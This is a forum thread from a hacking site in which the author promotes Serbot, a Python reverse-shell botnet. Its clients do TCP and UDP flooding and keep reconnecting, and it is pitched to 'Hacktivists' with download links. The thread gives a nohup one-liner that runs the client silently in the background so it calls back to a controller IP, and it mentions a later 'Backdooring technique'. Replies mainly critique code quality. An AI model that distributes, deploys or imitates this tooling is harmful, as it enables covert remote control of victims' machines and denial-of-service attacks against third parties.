Sinisterly
Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Hacking Tools (https://sinister.ly/Forum-Hacking-Tools)
+--- Thread: Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python (/Thread-Serbot-%E2%80%93-Advanced-Controller-Server-Client-Reverse-Shell-Bot-%E2%80%93-Windows-Linux-%E2%80%93-Python)

Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - dotcppfile - 11-27-2014

Hello everyone,

Picture:
Spoiler:
[Image: rsz_1rsz_serbot.png]



Serbot is hot, keep reading Lol.

So, lets just get to the point, I've showed you Awrs and what it's capable of, considered as one of the best Reverse Shells I've decided to Update Awrs and create Serbot and no, it's not what you think Lol.

Serbot is an advanced version of Awrs where the Server can be managed by 1 Controller at a time.
Example:
Server hosted on 15.48.158.15 and accepts up to 100 clients through port 1567, accepts 1 Controller at a time through port 2357 and the Controller's functions are protected with a password: "IAmAPassword"
Client 1 hosted on 86.58.157.25 connected to 15.48.158.15:1567
Client 2 hosted on 78.459.17.35 connected to 15.48.158.15:1567
Controller running on my own computer connected to the Server on 15.48.158.15:2357 using the valid password "IAmAPassword"

In Serbot's case, the Server also plays the role of a Bridge between the Clients and the Controller. This should sum things up. There's a lot of benefits out of this now that's for sure. A team of Researches or Hacktivists can now interact with all their clients using their Controllers, they don't have to worry about portforwading, reverse shell's stability and speed etc and they're all sharing everything they have control on in one place.

In Serbot, everything was dealt with, your Server will never crash nor will your Clients no matter what, check the feature list below for more info:

Server
  1. Linux/Windows Version.
  2. Multi Handler. Can handle multiple connections all at once.
  3. Bridge. Plays also the roll of a Bridge between the Clients and the Controller.
  4. The Controller's connection requires a plain text password, it's not the best but it's more than enough when it comes to keeping "l337 hax0rz b0t tak30v3r" away.
  5. Accepts only 1 Controller at a time.
  6. Kicks the Controller after 10 mins. This was added just in case someone forgot his Controller on which won't allow other controllers to connect (since the Server only accepts 1 controller at a time).
  7. Uses a very small amount of CPU and RAM when running.
  8. Fast and Stable.


Client
  1. Linux/Windows Version.
  2. TCP Flood.
  3. UDP Flood.
  4. You’ll never lose your shell. (Commands with No Output, Wrong Commands and Interactive Programs won’t kill your shell)
  5. Never closes and is always trying to connect to the Server.
  6. Can handle any command properly, such as the cd command.
  7. Always gets back a response. (Command Output or Simple Client response)
  8. Uses a very small amount of CPU and RAM when running.
  9. Fast and Stable.

Controller
  1. Linux/Windows Version.
  2. Handles all commands perfectly.
  3. Handles any stupidity (KeyboardInterrupts, empty commands, etc) perfectly.
  4. Uses a very small amount of CPU and RAM when running.
  5. Easy user interface.
  6. Fast and Stable.

This list isn't enough but that's all that I can think of right now. If you want to know how stable Serbot is then you have to try and code something similar to it Lol because then you'll know that it handles everything you're facing when it comes to bugs, errors, commands etc...


Download Links:
Can all be found at: http://dotcppfile.wordpress.com/2014/11/27/serbot-advanced-controllerserverclient-reverse-shellbot-windowslinux-python/

You simply have to remove the "#!/usr/bin/env python2" at the top of every script to get this up and running on windows.

Extra:
If you're trying to activate the Client threw ssl, shell or web shell then you have to run the Client.py in another process in the background or else your shell will dive into an endless loop and the best way to do that in Linux would be using nohup.
Example:
nohup python client.py 15.48.158.15 1567 </dev/null &>/dev/null &


Greetings to Team Prophetic, Chaoshackerz and all the followers of https://dotcppfile.wordpress.com/,
That's all for today,
dotcppfile.

RE: Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - dotcppfile - 12-03-2014

Since people asked for it, Serbot is now on Github: https://github.com/dotcppfile/Serbot

RE: Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - dopamine - 12-03-2014

as @Blunts would say "This is googled. You cant code. I will post private code later. My python code is better than any your code."

RE: Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - Blunt - 12-03-2014

This is googled. You cant code. I will post private code later. My python code is better than any your code.

Spoiler:
ROFL

RE: Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - Reiko - 12-03-2014

>considered as one of the best Reverse Shells
>no TTY

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA

I generally like you, but no. This is far from a good reverse shell.
It doesn't support any of the functionality of a real shell (bash, zsh, etc.) and handles its commands poorly. Checking if a string is in a received message does not equal checking what the user intended to do. For example, what if I wanted to do this:

Code:
mkdir cd ; ls ./cd
What would that do in your shell? Nothing like what I wanted.

Furthermore "except: pass" is not appropriate error handling in every situation. You could be introducing weird bugs into your code without raising any exceptions, and you could also be raising exceptions in the middle of critical sections.

RE: Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - dopamine - 12-03-2014

(12-03-2014, 07:03 PM)Reiko Wrote: >considered as one of the best Reverse Shells
>no TTY

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA

I generally like you, but no. This is far from a good reverse shell.
It doesn't support any of the functionality of a real shell (bash, zsh, etc.) and handles its commands poorly. Checking if a string is in a received message does not equal checking what the user intended to do. For example, what if I wanted to do this:

Code:
mkdir cd ; ls ./cd
What would that do in your shell? Nothing like what I wanted.

Constructive criticism, that is rare.

Quote:Accepts only 1 Controller at a time.
Kicks the Controller after 10 mins. This was added just in case someone forgot his Controller on which won't allow other controllers to connect (since the
Awkward.

RE: Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - dotcppfile - 12-03-2014

(12-03-2014, 07:03 PM)Reiko Wrote: >considered as one of the best Reverse Shells
>no TTY

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA

I generally like you, but no. This is far from a good reverse shell.
It doesn't support any of the functionality of a real shell (bash, zsh, etc.) and handles its commands poorly. Checking if a string is in a received message does not equal checking what the user intended to do. For example, what if I wanted to do this:

Code:
mkdir cd ; ls ./cd
What would that do in your shell? Nothing like what I wanted.

Furthermore "except: pass" is not appropriate error handling in every situation. You could be introducing weird bugs into your code without raising any exceptions, and you could also be raising exceptions in the middle of critical sections.

Well, if you're a bash 1 liner and a silly bitch that for some reason wants to create a dir called "cd" then this shell ain't for you Lol.
But you're right, it's not great but it's still one of the best when compared to all these public, php and python shells or netcat etc.

Also, about the Pass part, you're right, that's what everyone knows and talks about but the Try statements used in Serbot are not for error catching at all, they're there just in case something bad happened; the shell won't die and that's why I use pass. Every try statement is within a loop, if an error is found then everything will start all over again which isn't as bad as you think.
Also, every "critical" section was well dealt with as far as I know, it's all well tied up, give it a try mate, I'm ready to fix it if it's worth it. Serbot isn't a l337 hax0ring tool but it gets the job done pretty well and I've decided to share it, nothing more.

RE: Serbot – Advanced Controller/Server/Client Reverse Shell/Bot – Windows/Linux – Python - dotcppfile - 02-17-2015

New release: https://github.com/dotcppfile/Serbot/releases/tag/18%2F2%2F2015
Let me know what you think about the Backdooring technique and so whatever.

@Reiko
Serbot can now handle commands more properly in this new update, now you can go for your 1 lining bash commands Lol, let me know what happens.


I'm ready to fix and update or do whatever is needed to keep Serbot up and running so do not hesitate to criticize and make sure you include why Lol.